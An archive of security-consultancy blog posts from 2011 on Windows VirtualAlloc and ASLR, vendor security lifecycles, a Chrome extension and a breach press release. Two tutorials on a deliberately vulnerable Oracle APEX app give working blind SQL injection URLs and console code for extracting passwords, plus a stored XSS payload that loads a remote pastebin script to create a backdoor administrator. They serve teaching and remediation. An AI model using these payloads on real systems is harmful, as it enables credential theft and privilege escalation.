Tuesday, 27 December 2011

Introducing VirtualAlloc_s - A Potentially SDL Friendly Version of VirtualAlloc

As a follow on from our previous post on VirtualAlloc and the lack of randomization, and inspired by what the Chromium team did in their OS::Allocate function, we decided to sit down and write our version of VirtualAlloc_s. At which point it is only polite and fair to also give and tip of the hat and acknowledge Didier Stevens' work published in August and September 2011. Dider's work documented the EMET randomization [1][2][3] and his pseudo Address Space Layout Randomisation (ASLR) implementation.

Our VirtualAlloc_s and VirtualAllocEx_s functions are similar to the other Microsoft _s named safe versions of otherwise unsafe functions. The implementations are contained in a single header file and are designed as drop in replacements for any existing calls to VirtualAlloc or VirtualAllocEx.

At a high-level the implementation tries to randomize the address requested from VirtualAlloc (if the developer has not explicitly requested one). If the allocation fails due to say being an invalid address or already being allocated the implementation then falls back to using VirtualAlloc as-is, but alternating (after a random number of executions) between bottom-up or top-down allocations. This feature has the benefit of being guaranteed to work whilst also adding some unpredictability. In addition, we think that this behaviour is a very slight improvement over Google's solution to the problem. The finer details of the implementation are described below.

On the first call to VirtualAlloc_s or VirtualAllocEx_s the implementation initializes itself. This initialization includes seeding rand with the current PID, number of ticks and available RAM, randomly selecting the number of executions (between 1 and 3) that it'll switch between bottom-up and top-down allocations in the fall back scenario and finally selecting if it'll start in bottom-up or top-down fall backup mode. It also performs one low and one high allocation of the size requested by the user. These additional allocations are designed to add a bit more entropy to the fall back scenario. Once initialized and on each subsequent call the implementation generates a random address, attempts to allocate the address and if the allocation fails, falls back to the safe mode described previously.

We've tested the implementation using a number of unit tests. These tests have been in terms of performance overhead, thread safety, unique addresses and bias to specific addresses. Performance wise no noticeable overhead was observed in our unit test cases.

During an extended run (exceeding 110,000 iterations of the unit test cases on Windows 7 as a 32bit process) we recorded 2,048 different addresses being allocated. With regards to distribution while not perfectly uniform we did generally observe a good distribution across the address space as shown below:

Click image for a larger version
A similar run (exceeding 160,000 unit test cases on Windows 7 as a 64bit process) we observed 4,093 different addresses being allocated. Once again, the distribution it is not perfectly uniform. However, from a subjective perspective a good distribution was observed across the address space.

Click image for a larger version
Our proof of concept implementation is compatible with both 32 and 64bit platforms and is thread safe. However, we make no warranties implied or otherwise, that by using our implementation you won't run into issues, will actually gain any extra security or won't inadvertently introduce new security issues (the lawyers wrote that bit).

For developers looking to use the implementation it should simply be a case of search and replace for existing calls to VirtualAlloc/VirtualAllocEx. However, also keep in mind any static libraries or DLLs that your code uses won't benefit unless rebuilt to also use the new header. If you don't have the code to these components you'll need to work with your technology provider to get them to adopt it.

We've made all the code and materials associated with the implementation and testing available for download and additional peer review:
If you spot any mistakes or have any other feedback please feel free to get in touch with us

Finally with regards to license, as we did borrow (copy) some of the Google V8 teams code the implementation falls under the BSD license, so pretty much usable by anyone; but please check to make sure it's compatible with your current policies and licensing.

Wednesday, 21 December 2011

Breaking the Inevitable Niche/Vertical Technology Security Vulnerability Lifecycle

One of the observations we’ve made over the past fifteen years or so, is that things have only slightly improved with regard to new, niche or vertical specific technologies, security and the inevitable vulnerability lifecycle. When we say this, we mean niche and vertical software vendors achieving the utopia of building robust security throughout the development lifecycle to reduce, mitigate and sustain software security (aka an SDL).

Instead we live in a world where market forces almost dictate that security is taken seriously only once a product or market has matured or early exposure has been gained and come to the attention of researchers and/or regulators. While SDLs have become a hot-topic over the last ten years, the reality is organizations don't see security as a measure of quality but as a cost. So getting 'minimum viable product' to market due to time and market pressures is often still a reality, especially in markets where security hasn't hurt their business previously.

This might sound a ridiculous statement but bear with us. If we look at typically what happens with a new technology or market that successfully matures we see the following life-cycle:

The net result is that vendors don’t have an incentive to front load their investment in security; until they know their entry into an existing market with a product, or the establishment of new market is going to be a success. The reality is, if your products are not a success then it's unlikely that security researchers will look at your products (exceptions can exist) so you won’t be getting pressure from clients about security (other than maybe superficial marketing buzzword bingo requirements).

So this leads us to the inevitable vulnerability lifecycle for successful and initially less common or niche technologies:

If you think we’re just spinning a line, we've seen some really good examples over the past ten years or so. Essentially, it's a snowball effect. A technology piques the interest of a security researcher or academia (or a funded programme is created); time is invested and papers are released and presentations are given. This in turn raises the profile of the technology and it's weaknesses which increases the pressure on the technology/vendor.

Even technologies which are considered obscure or inaccessible over time will become the subject of scrutiny and security research. Independent researchers can obtain indirect funding for their time (via programs such as ZDI) or academia can invest which permits access to software or hardware potentially considered out of reach by the vendor. Additionally, where there is a drive within the community to create an open source implementation it can typically be re-purposed for security research. A great example here is OpenBTS/OpenBSC and everything it lead to in the field of active GSM/GPRS research. A technology previously considered out of reach by vendors and industry bodies is methodically picked apart. It can be expected in the future that it won't take twenty years (like GSM) for future technologies to get such close scrutiny.

Examples of technologies that we've had direct experience with that have followed this cycle include:
  • Cellular application protocols (WAP, SMS, MMS etc).
  • GSM, GPRS and 3G networks.
  • Mobile operating systems.
  • Mobile handset cellular baseband.
  • Bluetooth.
  • In car telematics.
  • SCADA.
  • Fixed line telecommunication equipment.
There are others we don’t have direct experience of, yet they have also followed the same cycle:
  • Embedded healthcare technology.
  • Smart grid (arguably a derivative of SCADA).
In each of these cases it wasn’t a question of IF there were security vulnerabilities, but more of which security researcher was going to get access to the technology first, find vulnerabilities and publish. It is hard to believe that vendors consider a 'lack of technology access' a suitable security stop-gap until such time that market or regulatory forces exist which demand that security issues be fixed and a mature SDL be deployed.

An example of the frustration felt by some quarters can be seen through emerging themes from the US government such as DIS (Designed in Security).

So if you’re a vendor, and your starting to receive reports of security vulnerabilities in your products; it means you’re getting to a stage of market penetration where you need to re-invest some of the return, and start paying back the security debt you've incurred to achieve success. For future products, deployment of a lightweight SDL will likely occur to try and regain control of the security balance.

However, the reality is that vendors will likely only ever deploy a full SDL if there is a material effect on their business because of security. This material effect could be regulatory, customer or market differentiation driven.

For the security research community, much like the great explorers it’s a continual race to find the new land of opportunity; a land where new vulnerabilities are easily found and a technology is ripe for exploitation.

So in summary, hardware and software security cannot be ignored in technology, no matter how niche or vertically aligned. If we ignore security we're laying eggs, that if the technology / market is successful will turn into bugs (of the security kind) being reported. These bugs may then with time lead to a full-on infestation which fatally undermines the security of the product. To break this cycle we need to treat not only the immediate host of the bugs (the software) but also the environment (development practices) to stop re-infestation (through component re-use) of future products.

Monday, 19 December 2011

Maltego for Windows Binary Analysis – Identifying Vendor Trust Relationships

So we've been working with Maltego on and off for a couple of years now to see how we can develop new transforms that add value and extend its functionality in useful ways. This has led to us experimenting a lot with small ideas (and some larger ones, but you’ll have to wait for those).

One of the ideas we had was, wouldn't it be useful to use the Maltego visualisation and data mining engine on Windows binaries? This is sort of a cool concept, but what useful information could we extract? Some braining storming later and we thought that in modern software development the end products we install can be made up of software components from many different vendors. So we thought if we extract this information we can start seeing relationships between:
  • Software publishers
  • Code signers
  • Geographic locations
  • Third/fourth party component providers

So we wrote a set of prototype Maltego local transforms to extract information from Windows binaries. The ones we created are:
  • Code signer and vendor company (from signature and binary details)
  • Binaries signed/produced by a company (inverse of the above)
  • Calculating file hashes
  • String extraction

As I said the goal was really to prove an idea and understand the value of both the visualization and the ability to leverage Maltego’s existing transforms to further mine data and relationships in relation to binaries. We see these plug-ins could be used as-is by organizations wishing to:
  • Understand the make up in terms of software publishers of an application / package
  • Identify code trust relationships between organizations
  • During malicious code analysis to identify sources of strings found in a binary (i.e. code fragments)

Anyway without further ado we've put together a rough little demo video of some of the transforms we wrote to give you an idea.

During the development we also wrote a C# helper class to expedite local transform development.  For example a very basic test case is now:

So that's it, idea to prototype in a single blog post..

If you’re interested in these plug-ins and what we’re doing with Maltego feel free to prop us an e-mail to maltego@recx.co.uk or contact us via Twitter @RecxLtd. We’ll happily share the plug-ins as-is with source code with interested parties.

Tuesday, 13 December 2011

The Curious Case of VirtualAlloc, ASLR and an SDL

So Address Space Layout Randomization (ASLR) is becoming increasingly common way on multiple platforms to not resolve security issues but frustrate exploitation. While doing a bit of further research into ASLR on Microsoft Windows 7 one weekend we tripped across some behaviour that was a revelation to us. The revelation was that VirtualAlloc is not subject to ASLR on Windows, this is unlike HeapAlloc and malloc. This fact is surprising considering that:
  • This behaviour is not documented on MSDN
  • This API is not on the Microsoft banned API list
  • Vendors can use VirtualAlloc to allocate memory read-execute, write-execute and read-write-execute

This obviously represents a risk if misused by software vendors and may not be flagged as bad even if the most rigorous of SDLs was adhered to. Why is this behaviour a risk? Well VirtualAlloc could potentially undermine the effectiveness of ASLR (when used) and create the break an aggressor needs.

So we then went looking to see who else was aware of this behaviour. We only found a single public reference when we tripped across Chris Rohlf’s and Yan Ivnitskiy’s Mantasano paper titled ‘Attacking Clientside JIT Compilers’ from the summer. In this paper the authors state:

However, the VirtualAlloc call on Win32 is not randomized by default and will return predictable allocations of contiguous memory at offsets of 0x10000 bytes. Fortunately, VirtualAlloc takes an optional argument indicating the desired page location to allocate. Creating a randomization wrapper around VirtualAlloc to simulate mmap’s existent behaviour should be a straightforward process.”

So armed with this we thought it would be useful to understand how prevalent the use of VirtualAlloc with memory protection constants such as PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY were. We decided to use 'cloud grep' aka Google code search.

Numerous examples were found in many different projects, including:

One of the more interesting implementations is in Google’s Chromium where they take heed of Chris's and Yan’s advice. 

So this is a real positive outcome, the vendor understands the risk, implements a mitigatation and moves on. Anyway, next we went onto binaries, we did a quick audit of files on one of our Windows 7 machines which included Office 2010. We notice that MSO.DLL uses the function.

Now for this to be of concern to us, we need to have 40h or 80h passed as the last parameter to VirtualAlloc. 40h is PAGE_EXECUTE_READWRITE and 80h is PAGE_EXECUTE_WRITECOPY. Looking through MSO.DLL we find at least one example where this occurs:

From this we know that Microsoft Office allocated memory that is RWX using VirtualAlloc on an otherwise enabled ASLR binary. Now this by itself is not a vulnerability, but knowing this behaviour exists means that there is a light at the end of the tunnel if you're trying to bypass ASLR.

We had a chat with Microsoft about the behaviour of VirtualAlloc. They were good enough to point out that there are numerous factors in the real world that could cause some randomization. These factors include the bottom up randomization in EMET, as documented by Didier in his post Bottom Up Randomization Saves Mandatory ASLR.

Anyway, in conclusion we see that there are a number of instances where VirtualAlloc is used in a potentially dangerous manner in the real-world by a variety of software vendors. While some vendors (credit to Google) mitigate the lack of randomness, not all will. Google and Microsoft are also not the only vendors to use this functionality; there are and will continue to be others who also use it. So in short this is something to add to your grep strings when doing code reviews in order to flag to development teams to ensure they're aware and mitigate appropriately.

We've released an SDL friendly version of VirualAlloc called VirtualAlloc_s.

Friday, 14 October 2011

Securing Oracle Apex - Big Bad Blog - Part 2

Welcome back, this week we will be discussing another page of the Big Bad Blog. If you haven't read part 1 it might be a good idea to start there.

Just another reminder to ensure that you have downloaded the free version of ApexSec through the ApexSec Online Portal. If you want to try out the exploits then you should import the Big Bad Blog into a workspace and run it.

Page 12 - Manage Users

This week we will be discussing the 'Manage Users' page, it might seem as though we have skipped a few pages (we'll get back to those). Here at Recx we review a lot of applications for our clients, and this has to be absolutely the most common vulnerability that we find. So with that in mind we will continue...

Cross-Site Scripting - Report Display Type


When we sign into the Big Bad Blog with an administrator account we have the option to click on the 'Manage Users' tab. We are then shown a report page with a list of users. Administrators are shown in red and normal users blue.
Because the code in the report outputs HTML in the select statement to change the colour, the report column cannot be set to 'Escape Special Characters'. If we look at the code it appears that the developer has quite rightly escaped the values using htf.escape_sc.

However if we tell ApexSec to highlight the instance (by clicking on the down icon) it becomes apparent where the vulnerability is.

As we can see, the else clause in the case statement is at fault here, if the column isadmin is set to null the vulnerability will manifest itself. It just so happens that all new users that are created have the isadmin column in the database table set to null, this is a bug in the code but it serves us well here.

Note: This condition is made more serious in that an exploitable condition exists in a low security domain (normal user) that affects a higher domain (admin).


As the field sizes are quite small we will need to transfer our exploit code from another server, pastebin is excellent for this purpose. We will place our exploit payload there.

We then go to the 'Add User' page of the Big Bad Blog and add a username of <script src="http://pastebin.com/raw.php?i=nbj5a2mE"></script>. If you have created your own pastebin script then obviously use your own unique id.

A bug in the Big Bad Blog, results in the following message being displayed when the user is added.

The account has been created, and this error message can safely be ignored.

Exploit Trigger

When the administrator visits the 'Manage Users' page the exploit will run. We can sign in with the credentials username: admin password: admin and visit the 'Manage Users' page.

The exploit isn't very subtle as you can see the html, but it serves our purpose here. Sign out of the administrator account after waiting for about 5 seconds (do not refresh the page). Then return to the login screen by using the logout link at the top right of the page.

Now we are back at the login screen you can login with the newly created 'backdoor' administrator user, with a password of 'hi'.

Correcting the code

Simply escaping the username in the case statement by using htf.escape_sc ensures the vulnerability is corrected.

Note: Have you already corrected the code in the Big Bad Blog? Want to check your changes? Use our ApexSec Online Portal! Just re-export your fixed Big Bad Blog, upload it into the portal and use your free credits to access the report and ApexSec project file.


Getting the report columns correct can be quite tricky, just blindly setting the report column type to 'escape special characters' quickly breaks applications when double escaping occurs.

As can be seen from the example above under the right circumstances the effect of this can be devastating with privilege escalation being a common attack vector.

Only ApexSec can identify issues where the report column needs to be set to standard report column because of HTML constructs being passed from the underlying code.

If you want to discuss how to make your Oracle APEX applications secure, feel free to get in touch.

Follow us on twitter to be the first to hear about part 3.

Thursday, 6 October 2011

Securing Oracle Apex - Big Bad Blog - Part 1

Are you looking for part 2 ?

We have created the 'Big Bad Blog' based on common security problems that we have found in many of the applications that we have reviewed. This APEX 4.1 application is freely available to download. Import into your own workspace on apex.oracle.com or your own site (Do not use in shared workspace or sensitive systems). As we work through the security conditions and the appropriate fixes you should be able to identify various coding practices that are unsafe.

Followers of this series will have the opportunity to try out our ApexSec product and work through the examples to swiftly identify security problems within the application.

Before we start ensure that you have downloaded the free version of ApexSec by signing up for the ApexSec Portal and accessing the relevant version for your platform from the Security Console section. If you want to try out the exploits then you should have imported the Big Bad Blog into a workspace and run it.

Page 1 - Messages

This page is the core page of the Big Bad Blog. It is typical of the type of code which is a old and complicated, nobody dares to touch it and all changes have been bolted on in time. The entire page should be re-designed but there is no time, the biggest we have seen exceeded 150 lines of code.

Running ApexSec on this page reveals several security issues. This is quite typical for APEX code which has been coded in this manner. As our application is quite small and we have compacted a lot of vulnerabilities into it, these vulnerabilities might seem obvious to you. Imagine a large app with 60+ pages, how long would it take? This is where ApexSec's cost savings can be found.

SQL Injection - Cursor Open Statement

As this is considered the most serious of web based vulnerabilities we will cover these first. In ApexSec we will select the 'Cursor Open' SQL Injection entry on the tree. ApexSec will load offending SQL into the SQL viewer and enable you to move through the issues with the navigation buttons

ApexSec shows quite clearly where the problematic concatenation occurs, in this case the items P1_AUTHOR and P1_SHOW are unsafely concatenated onto SQL which is passed into the open for statement.


In this case by simply manipulating the URL, the injection can occur, this would lead to the compromise of a user's password.

http://apex.oracle.com/pls/apex/f?p=<your app id>:1:<your session id>::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,1,1) = 'b')\

The request above, would display the blog entries if the guessed password character was correct. Then we can move through the password of the bob account by amending the substr statement. Paste these in immediately after the session id.

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,1,1) = 'a')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,1,1) = 'b')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,2,1) = 'a')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,3,1) = 'a')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,3,1) = 'b')\

The password is found to be 'bab' and the account is compromised.

Correcting the code

In this case the fix should be to apply the using clause to the open for to properly bind the variable (in this case it is slightly more tricky due to the dynamic nature of the query.

SQL Injection - Execute Immediate Statement

Examining the code in the delete_message page process reveals a very similar vulnerability with the execute immediate statement.

In this case it is the AJAX call that is vulnerable with a very similar concatenate error as with the open for vulnerability.


The easiest way to fire AJAX calls to APEX is to use the jquery interface. This can be done using the javascript console (in Firefox; Tools->Web Console, in chrome; Tools -> JavaScript Console)

The following JavaScript typed into the console will delete message 261 if the password begins with 'a'. The exploit is exactly the same as previously but with a slightly different attack vector.

var get = new htmldb_Get(null,<app id>,'APPLICATION_PROCESS=delete_message',1);
get.addParam('x01','<message id> AND EXISTS (select username from users where username = \'bob\' and substr(password,1,1) = \'a\')'); 
gReturn = get.get();
<app id> Should be set to the application id, <message id> should be retrieved from the HTML source of the page. Searching for "Alice Greeting" should reveal the following source (The message id is highlighted in red);

<B>Alice Greeting</B>
by <i>alice</i>
<a href="javascript:location.reload(true)" onClick="JavaScript:var get =
<app id>,'APPLICATION_PROCESS=like_message',1);get.addParam('x01','241');gReturn
= get.get();">Like</a>
<p>Hi, I am Alice a normal user that can create posts, my password is

So a similar sequence as before sould reveal the password one character at a time. Submit the following;

var get = new htmldb_Get(null,<app id>,'APPLICATION_PROCESS=delete_message',1);
get.addParam('x01','241 AND EXISTS (select username from users where
username = \'bob\' and substr(password,1,1) = \'a\')');
gReturn = get.get();

Reload the page, nothing happens (password does not begin with 'a'). Then:

var get = new htmldb_Get(null,<app id>,'APPLICATION_PROCESS=delete_message',1);
get.addParam('x01','241 AND EXISTS (select username from users where
username = \'bob\' and substr(password,1,1) = \'b\')');
gReturn = get.get();

Reload the page, the "Alice Greeting" message will be deleted. therefore the first character of the password is 'b'.

Correcting the code

Again it is a case of properly binding the variable into the execute immediate statement as follows.

Cross-Site Scripting

The first two instances of cross-site scripting are quite simple, outputting direct to the HTTP stream via htp.p calls without escaping is generally a bad idea.

Here the two variables title and author are pulled from the cursor and output directly, this leads to the vulnerability. If we forward to the third instance we can see a similar error but this time it is the result of a concatenation.

All three instances are exploitable but we will concentrate on the third instance.


Note: Some browsers may block this very simple XSS (notably chrome), code should not rely on the features of browsers to protect the site.

As we found the password for 'bob' earlier we might as well abuse this account. Login with username 'bob' and password 'bab'. To exploit this cross-site scripting vulnerability we need to change the full name using the My Details Tab in the Big Bad Blog.

Then when we 'like' a post in the blog the vulnerability will executed. This is an over simple example of an exploit but this is a blog about detection, not exploitation.

Correcting the code

Any variables that arrive from the database or from user input should be escaped using the htf.escape_sc function, this will ensure that any HTML tags and features are adequately escaped before outputting to the stream.

Page Access Protection

APEX provides protection against URL manipulation through Session State Protection where the URL is protected by a checksum, so the parameters cannot be modified. However, this should not be used to mitigate the underlying dangerous PL/SQL and SQL Injection issue. In fact, if we enabled SSP on this page the issue would still be exploitable by setting the P1_SHOW variable on any other page that did not have SSP enabled.

On the Messages page security settings we will set Page Access Protection to 'Arguments Must Have Checksum' and at the same time turn off the Autocomplete feature.

Item Protection

Using Item Protection on P1_SHOW and P1_AUTHOR will only protect these items from URL tampering. We will set the item protection to 'Checksum Required'.

Any attempts to manipulate these values from the URL as earlier in this tutorial will be correctly blocked by the APEX framework. However utilising the client side framework we can still submit the changes;


Using the JavaScript console, we can change the pull down combo box to be an input box in the browser, there are many ways to achieve the same effect.

a = document.getElementById('P1_SHOW');b = document.createElement('INPUT');b.setAttribute('type', 'text');b.setAttribute('size', '85');b.id = a.id;b.name = a.name;a.parentNode.appendChild(b);a.parentNode.removeChild(a)

We can then submit the SQL injection as before. It is worth noting that all the security features of APEX are now fully activated, only the deep analysis engine of ApexSec will find the outstanding vulnerabilities in the code.

Public Page

ApexSec has no way of knowing if you intended to make the page public, usually there is only a handful of pages that are to be served to unauthenticated users. The Messages page should be public and this report item can be ignored.

Other Problems

There are logic problems that ApexSec will not find (and never will), these are logic flows where the application does not operate as intended.

One of these for example is the delete_message page process. The way that the process is coded means that any user can delete other users messages, this is clearly not the intention of the application.

The login username is displayed on posts, this would be highlighted in our security reviews. Once again an automated scan would not help here.

The passwords are kept in the clear in the database, this is clearly bad practice and cannot be detected currently by ApexSec.

Using ApexSec does not remove the requirement for a manual review. With the issues such as those documented above, eliminated by developers through use of ApexSec throughout the development lifecycle, the manual review effort can be more focused and cost effective.


Although the code we are showing can be easily discarded as "we wouldn't code like that" and "that's not how to do it", these are based on real world examples. Some APEX code is old and because "it just works" nobody has taken a fresh look at the security posture.

At Recx we perform manual security audits of APEX code, we have developed tools and techniques over the past 18 months which we consider to be currently unique in the world. ApexSec is the automation of a selection of these techniques. We do not profess to be APEX feature experts or Oracle experts; we have one single focus, security. We devote our time into securing APEX code via detection and analysis.

If your business runs APEX code in production systems, if you have had non-permanent staff coding in your code base then a code review will give you peace of mind that the code running on your servers at least meets your required security standard.

Monday, 8 August 2011

How We Built the Recx Security Analyzer Chrome Extension

It’s not rocket science
The purpose of this post is to demonstrate that usable security tools don’t need to be rocket science and to hopefully inspire those of you with other ideas to write your own browser extensions. The reason we wrote the Chrome extension in the first place was that we felt that there were a number of low hanging fruit security attributes that should be accessible to development and quality assurance processes in a clear and easily understandable manner. We've also already had some feedback from security professionals that they sometimes forget to look for these issues and simple functions they can access in their browser are a good way to ensure they are consistent.

Why a Chrome extension?
The reasons we chose to write a Chrome extension was really two fold. The first is that development and QA already use a browser so why not just make it accessible via a tool users are already familiar with? The second was the thinking that Google’s Chromium team have done all of the heavy lifting, implementing HTTP, SSL/TLS, the DOM, JavaScript engine, Cookies etc. and provided programmatic access to the browser. So why would we want to re-implement the wheel in no doubt a lacklustre fashion over many months (if not years) and be plagued with corner cases and related dramas? The ideas we discounted included:
  • Writing a web security proxy or plug-in for an existing one. Discounted as we thought it would not be as intuitive or quick to install, set-up and use on a daily basis by non dedicated staff.
  • Writing it in C, Java, C#, or Python. Discounted as we thought parsing everything and building a UI would be a lot of work for no benefit. We did look at some Java / C# web browser libraries and felt they would be filled with the corner cases we mentioned due to their inability to keep up with the development speed of modern browsers. Or in the case of the Internet Explorer COM object a pig to work with that doesn't always expose easily everything we wanted (that prototype is in the hours wasted bin).
The extension’s components
So, the extension is made up of three components, the background element, the content element and the main popup element. All three of these components perform distinct functions which are described in detail below.

The background element
The background element is used to register the right-click context menus and the call-back to handle any processing of these events. When the user clicks on the right-click context menu the call-back is executed, the type being requested is understood, the URL obtained. Then a new tab is created with an instance of the popup element. At which point all control is handed to the popup for further processing. We encode the Chrome tab ID and the URL of page, frame or link being analysed by the user into the request parameters to the popup to perform a method of IPC.

The page content element
The page content element is used to parse the DOM of the requested page (as seen by the user). This is broken out into to two main functions. The first enumerates all the of page’s meta headers looking for security related attributes. The second parses the page looking for forms and form elements. These two functions build an object that contains the results ready to pass to the popup element. In order to reduce non-essential page load overhead we don’t execute this on every page load. Instead we only inject and execute this extra code on a case by case basis when the user requests us to. We found this had a profound impact on general Chrome performance and seemed to make us good browser citizens. Finally we register an IPC event listener looking for requests for the popup element to return the newly built results object. When a request comes in from the popup element we then return the results object as instructed.

The popup element
The popup is the main component and holds a majority of the logic and all of the user interface. This is behind the icon when the user clicks on the Recx icon or appears in the tab when the user clicks on the right-click context menu. The popup then does the following things:
  • The popup works out how it was called (browser icon versus right-click context menu) and the URL being analysed and the tab ID.
  • Performs an XMLHttpRequest to the URL requested, so inheriting any session cookies in order to obtain the HTTP headers from the server. Analyses any security related HTTP headers and builds the UI with the results. It also then builds the ‘All HTTP headers’ hidden DOM element for advanced users.
  • Enumerates all cookies within Chrome looking for those cookies that relate to the URL requested. Analyses them and builds the UI with the results. It also then builds the ‘All cookies’ hidden DOM element for advanced users.
  • Injects our content element into the Chrome tab for the page requested using the tab ID. Chrome provides a way for us to inject this content element not into the actual page but a container which has full access to the pages DOM. This then performs the operations described previously to analyse the DOM for security issues.
  • Sends a request via Chrome IPC to our content element for a copy of the results object and then receives it via an asynchronous call-back. Analyses the returned object for any security issues and builds the UI with the results.
  • Finally the popup element builds the rest of the UI using a mixture of JavaScript and DHTML and makes it visible to the user.

And ‘ta-da’ the user is then presented with the results. All the strings are actually pulled in from a locale file so if we ever want to dust off our schoolboy German, Spanish or French (or put our faith in Google translate) we can in theory easily support different languages.

Time effort spent
We thought it might be interesting to provide a breakdown of the time we spent developing the extension (but not the upfront research/wasted prototype code). We're going to caveat all of this with that we've never written a browser extension before, not written a tremendous amount of JavaScript recently and we're not intimately familiar with all the properties of every DOM object. The break down below is for all effort to-date across the team. In this time we've had three releases, the initial release, a spelling patch (doh!) and a new feature release.
  • Reading how to use the Chrome extension API: ~ 8 hours
  • Reading up on DOM element properties: ~2 hours
  • Writing code: ~14 hours
  • Testing: ~8 hours (across multiple versions of Chrome / OSs on multiple sites)
  • Bug fixing: ~ 3 hours
  • User interface: ~4 hours
  • Re-factoring because of security issue (see below): ~2 hours
  • Reporting bugs to Google: ~1 hour
  • Packaging, screen-shots and release: ~1 hour
The funny
While we were writing this extension we fell afoul of a security issue (which our SDLC code review caught before release) which is always amusing when you’re in the business of software security consultancy and writing security software. The root cause was that we were using innerHTML when building the results DOM with untrusted data instead of innerText. Net result is we would have been vulnerable to Cross-Site-Scripting had we shipped with it. There was a surprising amount of re-factoring required to move away from the use of innerHTML to innerText as you end up doing a lot of DOM building. But hey, who says security was free (aka don't take short cuts)? Anyway, for those of you considering writing your own extensions we recommend you read both the Chrome extensions documentation in detail (which does warn you in numerous places) and the recent blog post by the Chromium team titled ‘Writing Extensions More Securely’.

The browser as the next web security tool platform
We’re pretty passionate about the fact that we believe the browser will make a solid foundation for development and QA friendly web security vulnerability testing and regression tools. There are already examples of other extensions in the Chrome web store that provide a more penetration tester centric tool-set. This demonstrates to us that others clearly feel the same about the power of the browser. We already have our eye on a number of experimental Chrome extension APIs that once mainlined by Google will allow us to bring other more powerful tool-set to market. In the mean time we expect to further refine, polish and extend the existing extension.

Getting the extension, taking it for a spin and wrap-up
The extension is available free from the Chrome web store (23 users and counting – only several of which we suspect are our parents and siblings), please provide us feedback or feature requests.

If you want to see why we wrote this tool and the somewhat bi-polar nature of web security try running our plugin against (don't check ours out.. as err..):
Finally, we hope you found this post explaining our mindset and how we glued all the bits together informative and inspiring.

Thursday, 4 August 2011

WADA and Operation "Shady Rat"

Yesterday the World Anti Doping Agency (WADA) released a press release regarding the McAfee Operation Shady Rat report. There was no obligation in the released paper for WADA to make a public announcement, but in doing so they have at least recognised the analysis performed by McAfee Labs. McAfee uniquely identified 72 organisations, which it broke down into 6 sectors and 32 categories. Of those organisations, 4 were named, of those only WADA at the time of writing (August 4th, 2011) have released a public statement. We reviewed both the statement and McAfee's white paper, performed some high level analysis and drew some rudimentary but fair conclusions.

Information disclosure
WADA having been named by McAfee have done the responsible thing, acknowledged the white paper and communicated that they're looking into it. Unfortunately, that's not all they said. Their 6 paragraph press release goes on to reveal information about:
  • Their current defences (they use a managed solution from ISS (IBM)).
  • A previous apparently unrelated security breach (in February 2008, they don't appear on McAfee's radar until August 2009).
  • Their response to a breach of their email system (they upgraded their firewalls).
  • That they escalate attacks to both national and international law enforcement agencies.
  • That their Anti-Doping Administration & Management System (ADAMS) operates on a functionally different server to their email.
  • That ADAMS is highly secure and has never been compromised.
  • That McAfee have not provided them with any information on the attack, its extent or the systems involved.
Openly disclosing information about the defences that you have in place is poor security practice and potentially to the technically savvy reader undermines your good intentions. Although privacy of ones security operations is only a minor control, the more private you can keep your operations, the less informed an attacker will be. Although it's common to reveal information, through poor server configuration, vendor press releases etc, keeping as much information private rather than public is solid security advice.

The statement gives away far too much information; although essentially a public relations exercise by WADA it would be fair to conclude that they've been poorly advised by their representatives on what they should say. Acknowledge the white paper; say that you're taking it seriously; that you're conducting an investigation into McAfee's analysis; and welcome their involvement but not refuting their claims. To release a 'knee jerk' press release, is in this case not the best course of action and shows a lack of preparedness.

How would we have advised WADA?
We took the WADA press release and the material released by McAfee and authored the following response. This is how WE would have done it:
"Following the release of the McAfee white paper on Operation Shady Rat, WADA can confirm that we are in dialogue with McAfee and are investigating thoroughly the reported intrusions. This includes actively working with its retained security experts pending further specific information. We have already taken steps to further bolster the operational security of our systems by working with our security technology and service providers. We will continue to work with all parties concerned to ensure an appropriate and timely response until resolved in a satisfactory manner."
By issuing a press release similar to above would acknowledge the McAfee's report while outlining at a high the level steps being taken to investigate the specific claims. Additionally it demonstrates, but without giving specific details, that immediate reactionary and remedial actions have been taken and thus the seriousness with which it's being taken.

So why only four?
The white paper details intrusions of 72 organisations. Of those 72, only four were named explicitly in the paper:
McAfee does not detail why these organisations were selected to be named; and certainly from the WADA press release, the conclusion could be drawn that they didn't give their permission to be disclosed; nor were informed in advance of the disclosure. Interestingly, even though 68% of the organisations listed were in the United States, none were named. The author believes that naming the four organisations above was warranted to "reinforce the fact that virtually everyone is falling prey to these intrusions". Naming less than 6% of the total organisations represented adds little to the weight of the white paper (the remaining 68 organisations provide an equally powerful message).

The analysis presented is relatively lightweight and is presented without references, correlation with significant events along the timeline or analysis of countries notably absent from the list. The author eludes to the fact that further analysis would be interesting, but without access to the raw data we rely on McAfee potentially performing that analysis in the future.

Throwing stones in glass houses
Of course, it shouldn't go unnoticed that the author states:
"I am convinced that every company in every conceivable industry with significant size and valuable intellectual property and trade secrets has been compromised (or will be shortly)"
And then goes on to say:
"In fact, I divide the entire set of Fortune Global 2000 firms into two categories: those that know they've been compromised and those that don’t yet know."
Intel (the owner of McAfee) falls cleanly into both these categories, and it's also likely that McAfee security software is running within a significant portion of other organisations similarly categorised.

We don't dispute the quotes above, the threat posed to organisations is considerable, and credit should be given to McAfee Labs, for not sugar coating the information or the statistics presented.

  • Were WADA right to release a press statement? Yes.
  • How ethical were McAfee in naming some organisations and not others? Without knowing the reasons behind this it's hard to produce a definitive conclusion, however it would appear that not all organisations were treated equally.
  • Did WADA release too much information in their press release? Yes, without question. A more succinct response, concentrating on the McAfee release would have been a more appropriate announcement.
All of this goes to show that all organisations should be prepared for such disclosures. Having a pre-planned response in the case of such events for a variety of scenarios will ensure that messaging is clear, concise without further undermining your organisations security. As with all reactionary events it also good to run a fire drill to ensure that the organisations response processes are well known and second nature even if their need is hopefully never required.

Tuesday, 2 August 2011

DfT Browsing Habits and the Impact on Security

FOI and the release
